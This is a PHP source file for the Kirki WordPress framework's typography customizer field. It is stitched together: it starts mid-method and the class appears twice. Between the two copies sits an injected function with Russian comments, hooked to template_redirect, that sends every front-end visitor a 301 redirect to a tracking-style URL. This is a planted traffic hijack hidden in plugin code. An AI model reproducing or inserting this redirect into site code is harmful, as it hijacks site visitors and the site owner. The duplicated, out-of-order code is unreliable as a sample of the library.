$defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); 